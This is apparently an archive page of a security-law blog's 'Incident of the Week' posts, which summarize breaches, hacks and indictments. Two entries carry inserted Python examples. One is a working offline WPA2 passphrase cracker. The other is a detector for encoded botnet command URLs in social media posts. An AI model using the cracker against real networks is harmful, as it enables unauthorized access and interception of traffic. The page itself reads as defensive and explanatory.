If you aren’t following the ransomware attack on Kaseya’s VSA product and approximately 800-1500 of its users, you should be. Like many cyberattacks, this one came on the eve of a holiday weekend. As the company itself notes, “Kaseya’s VSA product has unfortunately been the victim of a sophisticated cyberattack. Due to our teams’ fast response, we believe that this has been localized to a very small number of on-premises customers only. … More
Category Archives: Incident of the Week
The SolarWinds Orion Hack: The Basics You Need to Know
By now, you have heard about the SolarWinds Orion hack. But what do you need to know about it?
First, if you want or need the technical details, the Cybersecurity and Infrastructure Security Agency (CISA) has them. In particular, on December 13, 2020, CISA released Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise, ordering federal civilian executive branch departments and agencies to disconnect affected devices.… More
Is the May 12 Massive Ransomware Attack a Turning Point?
Those “in the know” in the cybersecurity world have been aware for more than a year of the threat posed by ransomware, a type of malware that locks victims’ access to their files until they pay a ransom. But discussion of the threat was mostly confined to cybersecurity professionals, blogs like this one, and various guidance documents released by federal agencies during 2016. Ransomware may now have entered the general public consciousness in a big way.… More
Google Docs Phishing (in real time, May 3, 2017, 4:30pm)
If you check your email this afternoon, you may see a message that someone you know is sharing something on Google Docs. You should verify that separately before opening, as there is a widespread phishing attempt going around using such an invitation. More
Quick Thoughts About the Yahoo Breach
Another day, another 500 million Yahoo accounts breached. Our friends at the FTC are right on top of this with guidance for individuals with Yahoo accounts. First and foremost, change your Yahoo password.
According to Yahoo, the breached information may have included names, email addresses, telephone numbers, dates of birth, passwords, and security questions. Yahoo believes this information was stolen in late 2014.… More
Cybersecurity News and Notes – August 29, 2016
In Case You Missed It: Sometimes data breaches crop up in the most unlikely of places. Last week we learned that the vendor that handles fishing and hunting licenses for the states of Idaho, Oregon, and Washington was hacked. The breach potentially exposed the following information for those with fishing or hunting licenses in those northwest states: names, addresses, driver’s license numbers, dates of birth, and the last four digits of Social Security numbers. … More
Health Insurer Hit With A Record HIPAA Penalty: What Does It Mean?
Triple-S Salud Inc., a Puerto Rican health insurer, has been hit with a $6.8 million penalty from the Office for Civil Rights of the Department of Health and Human Services for a massive data breach. Triple-S (known as ASES in Spanish) has posted a notice on its website regarding the breach.
The penalty, which also is described in a securities filing, is based on a breach involving 13,336 of Triple-S’s Dual Eligible Medicare beneficiaries. … More
TripAdvisor Reports Data Breach
If you are like me, you may have received an email from TripAdvisor, alerting you that "an unauthorized third party had stolen part of TripAdvisor’s member email list." The text of that email was as follows:
To our travel community:
This past weekend we discovered that an unauthorized third party had stolen part of TripAdvisor’s member email list. We’ve confirmed the source of the vulnerability and shut it down.… More
Health Net Announces Second Major Breach in Two Years; Creates Potential for Largest Ever Penalty
On March 14, the California-based managed care organization, Health Net, Inc., announced that it cannot account for "several server drives" that contained protected health information. According to California regulators, these servers appear to contain the data of 1.9 million people nationwide:
The company announced today that nine of its server drives containing personal information for 1.9 million current and past enrollees nationwide are missing, including records for more than 622,000 enrollees in Health Net products regulated by the DMHC,… More
Incident of the Week: Army Intelligence Analyst In Custody After Claiming that He Leaked Thousands of Classified Documents
22-year-old U.S. Army intelligence analyst Bradley Manning is reportedly in custody in Kuwait after claiming that he sent 260,000 classified documents to the WikiLeaks website. According to WIRED, Manning, who served at Forward Operating Base Hammer near Baghdad in Iraq, made the admission after reaching out to former hacker Adrian Lamo in a series of Internet chats beginning on May 21st. Manning ominously began the conversation with the following:
(1:41:12 PM) Bradley Manning: hi
(1:44:04 PM) Manning: how are you?… More
Incident of the Week: Clickjacking Worm Induces Thousands of Facebook Users to “Like” Infected Websites
This week was an unusually optimistic one for hundreds of thousands of Facebook users who found that their accounts were automatically endorsing numerous oddly titled websites. If you have been avoiding Facebook, your closest Facebook user (anyone under the age of 30 is a safe guess) can explain that one way users have to share things with their friends, including websites, musicians, television shows, ideas and other users,… More
Incident of the Week: Blogger Shows Us How to Listen In On Private Facebook Chat
Yesterday, Facebook took down their Chat services to patch a flaw in Facebook’s new privacy settings that allowed users to listen in on private chat conversations. This apparently came hours after TechCrunch EU blogger Steve O’Hear taught the world how to exploit the flaw in his TechCrunch post and video. O’Hear was “tipped off that there is a major security flaw in the social networking site that,… More
Incident of the Week: “Huge Social Networker” Indicted For Threatening Spam Email Campaign Against New York Life
Yesterday, a federal grand jury in New York issued an indictment (.pdf) against Anthony Digati based on his threats to use spam email and the www.newyorklifeproducts.com domain to drag New York Life Insurance Company “through the muddiest waters imaginable.” Both the U.S. Attorney’s Office press release (.pdf) and the FBI press release announced the indictment.
Digati was arrested on March 8,… More
Incident of the Week: NSA Officer Indicted For Emailing Classified Documents to Reporter
On Wednesday, a federal grand jury in Maryland indicted Thomas A. Drake, a former employee of the National Security Agency (NSA), on charges that he emailed classified NSA documents and information to Siobhan Gorman, then a reporter for the Baltimore Sun. Drake worked for the NSA first as a contractor and then as a high level employee in the NSA’s Signals Intelligence Directorate between 1991 and 2008,… More
Incident(s) of the Week: Disgruntled Hacker Disables 100 Cars Purchased from Texas Auto Center
In late February and early March, around 100 cars in and around Austin, Texas either would not start or would not stop honking. This was apparently caused by 20-year-old hacker Omar Ramos-Lopez, who remotely triggered the vehicle immobilization system installed by dealership Texas Auto Center.
Apparently the dealership installed the GPS-enabled devices so that cars can be immobilized and repossessed when a customer fails to make scheduled payments.… More
Incident of the Week: Israeli Soldier Posts Details of Planned West Bank Raid on Facebook
This week the Incident of the Week title decisively goes to the Israeli soldier who updated his status on Facebook to identify the secret military raid on a town in the West Bank. His status apparently read: “On Wednesday we clean up Qatanah, and on Thursday, god willing, we come home” and provided the exact time of the raid. After detecting the clear breach of OPSEC,… More
Incident(s) of the Week: February A Tough Month For Hackers
1. Arrested: Russian Hacker Responsible for Two Minutes of Roadside Porn
The hacker who managed to compromise computer servers controlling a large commercial advertising screen in Moscow was arrested recently by Russian authorities. On January 14, 2010, commuters on Moscow’s Garden Ring Road passed a large-scale video screen and instead of the normal commercial advertisements saw two minutes of hard-core pornography. The video, as well as the resulting traffic problems,… More
Incident of the Week: Patents Help Crack Encryption Used in Cordless Telephones
This week cryptographers Karsten Nohl of the University of Virginia and Erik Tews of the Darmstadt University of Technology announced that they had broken the DECT encryption standard. Who cares, you ask? The Digital Enhanced Cordless Telecommunications or DECT standard is what prevents someone parked outside your house from being able to listen in on telephone conversations you are having on your 1.9 GHz DECT cordless phone. (So, that’s what that label on the receiver means.)
Nohl told Dan Goodin from The Register that he cracked the code by putting the DECT chip under the electron microscope and then comparing his findings with information disclosed in the published patent(s). … More
Incident of the Week: Free iPhone Password Breaker Released
Back in October you may remember our post on Elcomsoft, a Russian software company that came out with a program that recovers the passwords protecting common wireless networks. Well, they’re back this week with a program that will "enable[ ] forensic access" to password-protected backups for Apple iPhone and iPod touch devices. In other words, if someone obtains access to the computer you use to sync your iPhone they could also get access to "backups containing address books,… More
Incident of the Week: OIG Reports that the FBI Routinely Circumvented Electronic Communications Privacy Act
A report entitled A Review of the Federal Bureau of Investigation’s Use of Exigent Letters and Other Informal Requests for Telephone Records (.pdf) from the Department of Justice Office of the Inspector General (OIG) indicates that between 2003 and 2005, FBI routinely “circumvented the requirements of the Electronic Communications Privacy Act (ECPA)” by using so-called “exigent letters” to obtain telephone call data from telecommunications companies. … More
Incident(s) of the Week: Recent Updates from Prior Incidents
1. The FTC Fines Las Vegas Man $35,000 for Dumping Customer Financial Records In Public Dumpster
This week, the FTC finalized a $35,000 settlement with Gregory Navone, the real estate broker who left 40 boxes of customer tax returns, bank statements, consumer reports and other financial records in a public dumpster behind an office building in Las Vegas. The defendant agreed to the fine, which amounts to $875 per box,… More
Incident of the Week: Twitter Used In Sting Operation To Find Out Who Leaked TSA Security Directive
Rumors are circulating that Special Agents from the Transportation Security Administration (TSA) have been posing as a Connecticut blogger on Twitter to find out who leaked airport security screening procedures put in place after the recent attack by the “underwear bomber.” This is a new twist in what some are describing as an overzealous investigation of government documents posted online.… More
Incidents of the Week: Iranian Cyber Army Targets Twitter & $26 Software Application Intercepts U.S. Military Satellite Feeds In Iraq
1. Iranian Cyber Army Puts Twitter On Hold
Around 10 pm last night, the popular social networking site Twitter was apparently hacked by a group calling themselves the Iranian Cyber Army. Iran and Twitter have had a rocky relationship since last summer when Iranian citizens spread the protests over Iranian elections to the popular web site. During that time, links circulated on Twitter that allowed users to participate in DoS (Denial of Service) attacks on Iranian government websites. … More
Incident of the Week: Hack of Researchers’ Email Triggers “Climategate”
Compared to security breaches that involve credit card and bank account information, other breaches in security often get somewhat shortchanged in the media, notwithstanding the occasional hack of a celebrity cell phone. The same cannot be said of the purloined emails one hacker posted online that are alleged to be the back-and-forth between climate change researchers at the University of East Anglia in the United Kingdom, and which are at the center of a new controversy in the public debate over climate change.
Incident of the Week: U.S. Law Firms and Public Relations Firms Hit By E-mail Attack
Law firms holding sensitive data for their clients are the targets of a new round of organized cyberattacks, federal authorities cautioned this week. On Tuesday, the FBI warned that U.S. law firms and public relations firms were being targeted by hackers using “spear phishing” attacks — personalized emails drafted to look like they come from a trusted or reputable source and designed to induce the reader to click an attachment or link that will infect his or her computer with malicious software. … More
Incident of the Week: ChoicePoint Settles FTC Charges That It Failed To Turn On “Key Monitoring Tool”
This week, ChoicePoint, Inc. finalized its settlement with the Federal Trade Commission (FTC) to resolve charges stemming from a 2008 breach that compromised the personal information of 13,750 consumers. This case is notable, even though the size of the breach and the monetary payment involved are relatively modest, because the underlying breach allegedly resulted from the ineffective implementation of security tools.
Incident of the Week: Russian Company Proves That WiFi/Wireless Networks No Longer Secure
ElcomSoft Co. Ltd., a Moscow-based software company, has announced software that recovers the passwords protecting wireless networks by guessing them at high speed on a PC fitted with a high-end consumer graphics card. The attack still depends on guessing the network’s passphrase, so a long, random one remains out of reach; but the speed-up from the graphics card means that a network protected by a short or dictionary-based password could be opened, and its traffic intercepted, by anyone with the software and an ordinary PC, even where the network uses the common encryption algorithms. The easy availability of this software may mean that companies using WiFi/wireless networks may need to take additional security steps to comply with information security rules in the U.S. and Europe.
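To make concrete why a graphics-card password cracker matters, here is an added example (not ElcomSoft’s code and not part of the original post) of the offline attack such tools automate against WPA/WPA2-PSK: the attacker sniffs one 4-way handshake, then for each guessed passphrase derives the PMK (PBKDF2-HMAC-SHA1, 4096 rounds), expands it to the key confirmation key, and recomputes the handshake MIC until one matches. The MAC addresses, nonces, EAPOL frame, SSID and word list are constructed values, not from any real capture; the derivation steps follow IEEE 802.11i. Nothing is sent on the air, which is exactly the point: every guess costs the attacker 8192 SHA-1 operations and nothing else, and the GPU simply runs more of those per second.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed sample values (assumptions for this example, not from a real capture).
SSID = b"HomeNetwork"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for message 2 of the 4-way handshake, MIC field already zeroed
# (that is how the frame looks when the MIC is computed over it).
EAPOL_FRAME = b"\x01\x03\x00\x5f\x02\x01\x0a\x00" + b"\x00" * 91


def wpa_pmk(passphrase: str, ssid: bytes) -> bytes:
    """802.11i passphrase-to-PMK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.
    This is the step that dominates cracking cost and that GPUs parallelise."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def wpa_prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def wpa_kck(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key = first 16 bytes of the PTK derived from the PMK,
    both MAC addresses and both handshake nonces (all visible to a sniffer)."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return wpa_prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/AES handshake MIC: HMAC-SHA1 over the EAPOL frame, truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str) -> bytes:
    """Simulate the sniffed artefact: the MIC the legitimate client produced."""
    kck = wpa_kck(wpa_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_FRAME)


def crack(captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: re-derive the MIC for each guess, no network needed.
    Returns the matching passphrase, or None if it is not in the list."""
    for guess in wordlist:
        kck = wpa_kck(wpa_pmk(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, EAPOL_FRAME), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    mic = capture_handshake("sunshine1")  # the network's (weak) real passphrase
    words = ["password", "letmein", "sunshine1", "correct horse battery staple"]
    print("recovered:", crack(mic, words))
```

The defensive lesson follows directly from the code: the only per-guess cost the defender controls is the passphrase’s entropy, since the SSID salt and the 4096-round PBKDF2 are fixed by the standard. A passphrase that is not in any word list forces the attacker through the whole keyspace, and WPA2-Enterprise (802.1X) removes the shared passphrase entirely.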
Incident of the Week: Ever-Growing Breach Involving Passwords for Hotmail, Gmail, Yahoo, AOL, Earthlink and Comcast
Incident(s) of the Week: Double Feature
Incident of the Week: in our first double feature, we report on the recent breach announced at the University of North Carolina and the plea agreement reached with one Massachusetts inmate who hacked the prison computer system while still behind bars.
Incident of the Week: Declassified Documents Show FBI Expanding Data Mining Efforts Over 1.5 Billion Personal Records (And Counting)
Declassified documents obtained (but not published) by WIRED Magazine indicate that the FBI has been hard at work expanding a database of Americans’ personal and financial information. According to WIRED, the FBI’s National Security Branch Analysis Center (NSAC) has compiled a database of “more than 1.5 billion government and private-sector records” and has been mining this database for use in criminal investigations. The data, which apparently has been obtained from a number of private companies,… More
Incident of the Week: Security Officer Indicted On Obstruction of Justice Charges For Shredding Evidence
Thomas Raffanello, global director of security for Stanford Financial Group (SFG), now faces charges of obstruction of justice based on claims that he directed employees at SFG’s Fort Lauderdale office to shred evidence of fraud.
In February, the Securities and Exchange Commission (SEC) filed a complaint against SFG (.pdf) in Texas alleging that the double-digit returns it promised potential customers were part of a fraudulent scheme. … More
Incident of the Week: Indictments Issue Against The Individuals Behind RNS, Pirate Site for “Pre-Release” Music
Yesterday, a federal indictment was issued charging four individuals for their roles in "Rabid Neurosis" or RNS, an alleged "Internet music piracy group" that distributed copies of music prior to their commercial release. According to the seven-page indictment (.pdf) filed in the federal court for the Eastern District of Virginia, between 1999 and 2007, RNS obtained and distributed a number of notable albums before they were released,… More
Incident of the Week: NCUA Issues Fraud Alert Based On Fake NCUA Fraud Alert (Which Turns Out To Be Part of Security Consultant’s Penetration Testing)
The National Credit Union Administration (NCUA) issued an official NCUA Fraud Alert on August 25, 2009 reporting that someone was sending around a fake NCUA Fraud Alert (.pdf) with CDs purporting to contain security software updates, but instead contained malware. The NCUA warned “Should you receive this package or a similar package DO NOT run the CDs.” The NCUA, which regulates federally insured credit unions,… More
Incident of the Week: Social Networking Sites Used as Command and Control Structure for BotNets
Are you having trouble making sense of social networking sites like Twitter? It may be because you are trying to read an encoded command to a malware-infected computer. Security researcher Jose Nazario at Arbor Networks has discovered that popular social networking sites like Twitter and Jaiku are being used to control botnets, armies of computers that have been infected with malware enabling the individual controlling the botnet to steal user information and direct the computers to attack others. … More
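The reason a public timeline works as a command channel is that the bot only needs to read: it polls an account it already knows and decodes whatever it finds there. As an added example (not code from Arbor Networks or from the original post), the following detector scans a batch of posts for tokens that look like base64 and decode to a URL, the pattern under which a bot would be told where to fetch its next payload. The sample posts, the hypothetical URLs in them, and the assumption that commands are base64-encoded URLs are all constructed for this illustration; a real feed would also need rate limiting and allow-listing of legitimate encoded content.

```python
import base64
import binascii
import re
from typing import Iterable, List, Optional, Tuple


def _b64(s: str) -> str:
    """Helper used only to build the constructed sample posts."""
    return base64.b64encode(s.encode()).decode()


# Constructed sample posts (assumptions for this example, not real tweets):
# one benign, two carrying base64-encoded hypothetical URLs, one with a
# base64-looking token that decodes to ordinary text.
SAMPLE_POSTS = [
    "Great coffee this morning, ready for the week!",
    _b64("http://example.com/updates/payload.bin"),
    "lol check this out " + _b64("fake content") + " #random",
    _b64("http://example.net/bot/cmd"),
]

# A run of at least 16 base64 alphabet characters, optionally padded, not
# embedded inside a longer run of the same alphabet.
BASE64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])"
)
URL_SHAPE = re.compile(r"^https?://[\w.-]+(?:/\S*)?$")


def decode_candidate(token: str) -> Optional[str]:
    """Decode a base64-looking token to printable ASCII, or None if it is not
    valid base64 (including tokens whose length cannot be padded to a multiple of 4)."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_encoded_urls(text: str) -> List[str]:
    """Return every base64 token in the text that decodes to something URL-shaped."""
    hits = []
    for match in BASE64_TOKEN.finditer(text):
        decoded = decode_candidate(match.group(0))
        if decoded and URL_SHAPE.match(decoded):
            hits.append(decoded)
    return hits


def scan(posts: Iterable[str]) -> List[Tuple[str, str]]:
    """Pair each post with each hidden URL it carries; benign posts produce nothing."""
    return [(post, url) for post in posts for url in find_encoded_urls(post)]


if __name__ == "__main__":
    for post, url in scan(SAMPLE_POSTS):
        print(f"suspicious post {post!r} -> {url}")
```

The same logic applies to any text channel a bot can read anonymously (status fields, comments, pastes); what it cannot do is distinguish a command from a harmless encoded link, so the result is a triage signal to be correlated with the posting account’s history, not a verdict.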
Incident of the Week (Year?): Hacker Responsible for Largest Data Breach in U.S. History Indicted
According to a press release from the United States Attorney’s Office for the District of New Jersey, yesterday an "indictment was returned against three individuals who are charged with being responsible for five corporate data breaches, including the single largest reported data breach in U.S. history." According to the press release, the indictment describes a scheme whereby Albert "Segvec" Gonzalez and two unnamed Russian defendants (identified as "Hacker 1"… More
Incident of the Week: Seattle Man Sentenced To Three Years In Prison For Using Peer-To-Peer Software To Steal Financial Records, Commit Identity Theft
Yesterday, Frederick Eugene Wood of Seattle was sentenced to 39 months in prison for using LimeWire peer-to-peer (P2P) software to obtain Social Security numbers, bank and financial records and tax returns, which he then used to commit identity theft. The complaint (.pdf) filed in federal court for the Western District of Washington in March alleged that Wood took advantage of the fact that users sometimes install LimeWire or other peer-to-peer software on computers without limiting the directories and files made available to the peer-to-peer network. … More
Incident of the Week: Latvian Internet Service Provider Shut Down After Being Linked to Cybercrime Ring
Earlier this week, Latvian internet service provider Real Host was shut down by its upstream providers Junik and TeliaSonera after security experts linked Real Host to a number of criminal activities. Among the many activities allegedly conducted through Real Host were the use of malware to steal banking credentials, spam email campaigns and the hosting of command and control servers for the Zeus botnet (i.e.,… More
Incident of the Week: Hackers to Demonstrate How To Take Control Over Every Apple iPhone In The World With A Single Text Message Today
Speaking at the Black Hat computer security conference in Las Vegas only a few hours from now, hackers (or "security experts") Charlie Miller and Collin R. Mulliner are scheduled to expose an alleged security flaw in the Apple iPhone that may allow someone sending a single SMS message to take control of any iPhone. According to a number of reports (note Forbes and AppleInsider),… More
Incident of the Week: UAE Carrier Updates Blackberry Software With Spyware, Captures Outgoing User Emails
On Tuesday, Research In Motion, Ltd. (RIM), the maker of Blackberry, posted a note on its website confirming that a software update offered to customers of the carrier Etisalat in the United Arab Emirates contained spyware. According to the note, certain customers received an SMS message from Etisalat informing them of a software update (named “Registration”) designed to improve performance. However, RIM acknowledged, “[i]ndependent sources have concluded that Etisalat’s Registration software application is not actually designed to improve performance of a Blackberry Handheld,… More
Incident of the Week: French Hacker Compromises Twitter Employee Passwords, Steals Company Documents
This week, Twitter co-founder Evan Williams confirmed that the company has been the victim of an attack that compromised a number of employee personal accounts at Amazon, PayPal and AT&T, employee personal email and Twitter’s internal company documents. The hacker, who goes by the handle “Hacker Croll,” has apparently emailed a collection of 310 internal Twitter documents to TechCrunch, including a presentation for a proposed reality television show called “Final Tweet”… More
Incident of the Week: Goldman Sachs Programmer Arrested for Transfer of Top Secret Source Code for Goldman’s Automated Trading System
On July 3, 2009, the FBI arrested Sergey Aleynikov, a Goldman Sachs programmer, as he disembarked at Newark airport on charges that he violated the Economic Espionage Act (18 U.S.C. sec. 1832, theft of trade secrets) when he sent company data to an overseas document server.
Incident of the Week: FBI Arrests Hacker Posing as Security Guard Who Infiltrated Texas Hospital Days Before “Devil’s Day” Attack
This week, the U.S. Attorney’s Office for the Northern District of Texas announced that the FBI has arrested Jesse William McGraw, a 25-year-old contract security guard at the W. B. Carrell Memorial Clinic, a hospital in Dallas, Texas, for hacking the hospital’s computers and air conditioning system. For many businesses, an attack on ventilation systems might be an inconvenience, but the threat could be much more serious for critical care patients in healthcare institutions like the Carrell Clinic. McGraw is charged with violations of the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. sec. 1030.